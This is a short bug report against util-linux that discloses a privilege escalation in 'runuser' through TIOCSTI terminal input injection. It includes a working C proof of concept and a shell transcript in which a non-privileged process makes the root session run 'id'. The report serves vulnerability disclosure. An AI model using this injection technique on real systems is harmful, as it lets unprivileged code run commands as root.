Package: util-linux
Version: all
Severity: important
When executing a program via "runuser -u nonpriv program" the
nonpriv session can
escape to the parent session by using the TIOCSTI ioctl to push
characters into the
terminal's input buffer, allowing privilege escalation.
This issue has been fixed in "su" by calling setsid() and in "sudo" by
using the "use_pty" flag
# cat test.c
#include <sys/ioctl.h>
int main()
{
char *cmd = "id\n";
while(*cmd)
ioctl(0, TIOCSTI, cmd++);
}
# gcc test.c -o test
# id saken
uid=1000(saken) gid=1000(saken) groups=1000(saken)
# runuser -u saken ./test ---> last command i type in
id
# id ---> did not type this
uid=0(root) gid=0(root) groups=0(root)
Thanks,
Federico Bento
----------------------------------------------------------------
This message was sent using IMP, the Internet Messaging Program.
